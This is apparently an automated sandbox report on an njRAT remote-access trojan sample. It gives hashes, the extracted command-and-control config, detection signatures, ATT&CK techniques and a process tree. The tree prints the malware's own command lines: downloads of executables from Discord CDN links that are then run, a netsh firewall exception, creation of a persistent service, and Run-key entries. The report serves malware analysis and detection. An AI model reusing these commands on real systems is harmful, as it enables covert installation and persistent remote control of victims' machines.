njrat | 534b9bc8809ae37a2beada5b9d868bda1c17c32be812ec3b30de2ad2382014a0

Analysis

max time kernel
153s
max time network
152s
platform
windows10_x64
resource
win10-en-20211104
submitted
27-11-2021 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe
Size

355KB
MD5

42c690607f11ff38887673a9cb86f1c9
SHA1

a7fcd7c5082cb6a8c96997cba1d050d808294fcb
SHA256

534b9bc8809ae37a2beada5b9d868bda1c17c32be812ec3b30de2ad2382014a0
SHA512

71cef63a004765358e8f98328f4b23d209f05cfe653ea8da3d0fe40cfc972e323258ec822185850373fc4d95b3288fbd325f9dd1642a4382101160cb0a87543d

Score

10^/10

njrat 1 evasion persistence suricata trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

4.tcp.ngrok.io:11271

Mutex

4e889e7da72189e24bc725ec5f51224f

Attributes

reg_key
4e889e7da72189e24bc725ec5f51224f
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

extd.exeextd.exeextd.exeJoyLaunch.exeextd.exesetup.exeextd.exegpue.exeserver.exe

pid process

4556 extd.exe
4628 extd.exe
4520 extd.exe
768 JoyLaunch.exe
4492 extd.exe
3164 setup.exe
3156 extd.exe
2632 gpue.exe
5100 server.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4556	extd.exe
4628	extd.exe
4520	extd.exe
768	JoyLaunch.exe
4492	extd.exe
3164	setup.exe
3156	extd.exe
2632	gpue.exe
5100	server.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe	upx

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4e889e7da72189e24bc725ec5f51224f.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4e889e7da72189e24bc725ec5f51224f.exe	server.exe

Loads dropped DLL 11 IoCs

Processes:

setup.exe

pid	process
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\4e889e7da72189e24bc725ec5f51224f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4e889e7da72189e24bc725ec5f51224f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Windows directory 5 IoCs

Processes:

gpue.execmd.exesetup.exe

description	ioc	process
File opened for modification	C:\Windows\parameters.ini	gpue.exe
File created	C:\Windows\gpu_name.txt	cmd.exe
File created	C:\Windows\parameters.ini	setup.exe
File created	C:\Windows\proceslist.txt	setup.exe
File created	C:\Windows\gpue.exe	setup.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe	nsis_installer_2

Modifies data under HKEY_USERS 1 IoCs

Processes:

WMIC.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exegpue.exe

pid	process
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
3164	setup.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe
2632	gpue.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

5100 server.exe

pid	process
5100	server.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

gpue.exeWMIC.exeserver.exe

description	pid	process
Token: SeDebugPrivilege	2632	gpue.exe
Token: SeAssignPrimaryTokenPrivilege	3140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3140	WMIC.exe
Token: SeSecurityPrivilege	3140	WMIC.exe
Token: SeTakeOwnershipPrivilege	3140	WMIC.exe
Token: SeLoadDriverPrivilege	3140	WMIC.exe
Token: SeSystemtimePrivilege	3140	WMIC.exe
Token: SeBackupPrivilege	3140	WMIC.exe
Token: SeRestorePrivilege	3140	WMIC.exe
Token: SeShutdownPrivilege	3140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3140	WMIC.exe
Token: SeUndockPrivilege	3140	WMIC.exe
Token: SeManageVolumePrivilege	3140	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3140	WMIC.exe
Token: SeSecurityPrivilege	3140	WMIC.exe
Token: SeTakeOwnershipPrivilege	3140	WMIC.exe
Token: SeLoadDriverPrivilege	3140	WMIC.exe
Token: SeSystemtimePrivilege	3140	WMIC.exe
Token: SeBackupPrivilege	3140	WMIC.exe
Token: SeRestorePrivilege	3140	WMIC.exe
Token: SeShutdownPrivilege	3140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3140	WMIC.exe
Token: SeUndockPrivilege	3140	WMIC.exe
Token: SeManageVolumePrivilege	3140	WMIC.exe
Token: SeDebugPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe
Token: 33	5100	server.exe
Token: SeIncBasePriorityPrivilege	5100	server.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

gpue.exe

pid process

2632 gpue.exe

pid	process
2632	gpue.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.execmd.exesetup.execmd.exenet.execmd.execmd.execmd.execmd.exenet.exegpue.execmd.exe

description	pid	process	target process
PID 4028 wrote to memory of 4576	4028	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 4028 wrote to memory of 4576	4028	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 4576 wrote to memory of 4556	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4556	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4556	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4628	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4628	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4628	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4520	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4520	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4520	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 768	4576	cmd.exe	JoyLaunch.exe
PID 4576 wrote to memory of 768	4576	cmd.exe	JoyLaunch.exe
PID 4576 wrote to memory of 768	4576	cmd.exe	JoyLaunch.exe
PID 4576 wrote to memory of 4492	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4492	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 4492	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 3164	4576	cmd.exe	setup.exe
PID 4576 wrote to memory of 3164	4576	cmd.exe	setup.exe
PID 4576 wrote to memory of 3164	4576	cmd.exe	setup.exe
PID 4576 wrote to memory of 3156	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 3156	4576	cmd.exe	extd.exe
PID 4576 wrote to memory of 3156	4576	cmd.exe	extd.exe
PID 3164 wrote to memory of 2856	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 2856	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 2856	3164	setup.exe	cmd.exe
PID 2856 wrote to memory of 424	2856	cmd.exe	net.exe
PID 2856 wrote to memory of 424	2856	cmd.exe	net.exe
PID 2856 wrote to memory of 424	2856	cmd.exe	net.exe
PID 424 wrote to memory of 596	424	net.exe	net1.exe
PID 424 wrote to memory of 596	424	net.exe	net1.exe
PID 424 wrote to memory of 596	424	net.exe	net1.exe
PID 3164 wrote to memory of 4064	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 4064	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 4064	3164	setup.exe	cmd.exe
PID 4064 wrote to memory of 400	4064	cmd.exe	sc.exe
PID 4064 wrote to memory of 400	4064	cmd.exe	sc.exe
PID 4064 wrote to memory of 400	4064	cmd.exe	sc.exe
PID 3164 wrote to memory of 1060	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1060	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1060	3164	setup.exe	cmd.exe
PID 1060 wrote to memory of 1300	1060	cmd.exe	sc.exe
PID 1060 wrote to memory of 1300	1060	cmd.exe	sc.exe
PID 1060 wrote to memory of 1300	1060	cmd.exe	sc.exe
PID 3164 wrote to memory of 1428	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1428	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1428	3164	setup.exe	cmd.exe
PID 1428 wrote to memory of 1756	1428	cmd.exe	sc.exe
PID 1428 wrote to memory of 1756	1428	cmd.exe	sc.exe
PID 1428 wrote to memory of 1756	1428	cmd.exe	sc.exe
PID 3164 wrote to memory of 1820	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1820	3164	setup.exe	cmd.exe
PID 3164 wrote to memory of 1820	3164	setup.exe	cmd.exe
PID 1820 wrote to memory of 2204	1820	cmd.exe	net.exe
PID 1820 wrote to memory of 2204	1820	cmd.exe	net.exe
PID 1820 wrote to memory of 2204	1820	cmd.exe	net.exe
PID 2204 wrote to memory of 2432	2204	net.exe	net1.exe
PID 2204 wrote to memory of 2432	2204	net.exe	net1.exe
PID 2204 wrote to memory of 2432	2204	net.exe	net1.exe
PID 2632 wrote to memory of 2416	2632	gpue.exe	cmd.exe
PID 2632 wrote to memory of 2416	2632	gpue.exe	cmd.exe
PID 2632 wrote to memory of 2416	2632	gpue.exe	cmd.exe
PID 2416 wrote to memory of 3140	2416	cmd.exe	WMIC.exe
PID 2416 wrote to memory of 3140	2416	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe
"C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\A4DE.bat C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4576

C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4556

C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4628

C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/877176601429819402/894936762034561024/JoyLaunch.exe" "JoyLaunch.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4520

C:\Users\Admin\AppData\Local\Temp\5885\JoyLaunch.exe
JoyLaunch.exe
3⤵
- Executes dropped EXE
PID:768

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
5⤵
PID:5088

C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893540407105949760/893540461770317844/setup.exe" "setup.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4492

C:\Users\Admin\AppData\Local\Temp\5885\setup.exe
setup.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net stop GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\net.exe
net stop GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop GPUService
6⤵
PID:596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc delete GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:4064

C:\Windows\SysWOW64\sc.exe
Sc delete GPUService
5⤵
PID:400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\sc.exe
Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
5⤵
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C sc description GPUService ServiceManagerForGPU
4⤵
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\SysWOW64\sc.exe
sc description GPUService ServiceManagerForGPU
5⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net start GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\SysWOW64\net.exe
net start GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start GPUService
6⤵
PID:2432

C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3156

C:\Windows\gpue.exe
C:\Windows\gpue.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\SysWOW64\cmd.exe
cmd /c wmic path win32_VideoController get name > C:\Windows\gpu_name.txt
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3140

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5885\JoyLaunch.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\5885\JoyLaunch.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe

MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\5885\setup.exe

MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\A4DE.bat

MD5
59ef9b78487398a566948c919f40a113

SHA1
f190741c8f762f0e07cfa27796b380817aa0ef35

SHA256
7585f3f01f07e37cee07c0fdd753b1c6214385a9ff6e061e981715533996ed44

SHA512
abaf8ff5b2ebb07a687235918c8f60f121c5dfcc528943a9ca4d8a1c3ecda6dd13fbd421dd70241c37ec09d1eb842e4185661ce8cce7ebf5afe59be0806630ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4DC.tmp\A4DD.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Windows\gpue.exe

MD5
4f5546a65f13faa1552e34d301b03dfe

SHA1
47d430278d13f8d23d5d865777ca14ebf7bae296

SHA256
e172c632cd031235affc1ae38c1f18674eb069a80bba7c6358551247ed010061

SHA512
f8779f5f9bf5b776142b5d6e821bd2ed4a7618406f153d4d82cfb2ea80c4dd194b1ade72694388ad911ce1a3929f02a4cd62f347febfa15e4931e68f5f1bd5d9

Download Submit
C:\Windows\parameters.ini

MD5
a9e16c8820bc8ea84968c423771c42c1

SHA1
8a384cd91f77bc8c6a4408ea0dd0b0a4e9d6cd54

SHA256
2c78aef611fae9862278a6f5f0677686d2bdf911fa441a39b5f3bc0d028a7bc8

SHA512
71d9e01f34a625d3756580c03d8e520552ea4d68ce78ca3adf69594947014adb4ec0ccbfef1cc64b7f0961726baa69a083829ef87aadf71dd7dba9a65e29f114

Download Submit
C:\Windows\proceslist.txt

MD5
a6ed38248f19079a4503576153d91409

SHA1
0bbc351696d5fd8659f1f18c36195bd192869bc8

SHA256
e26ad6677297f6476356bb6c368c5f933165a16635c4bd6c2aad5e8d6784f5f5

SHA512
f064c6f52fe247cdb801bbcae07d1636dace09f8500460660472cb9918f75e92ebcf89c8b6aa45e7c830839a5aea323c310bf0c93d90f5d77242bb50aa86e31f

Download Submit
\Users\Admin\AppData\Local\Temp\nsuB4DB.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsuB4DB.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsuB4DB.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsuB4DB.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsuB4DB.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
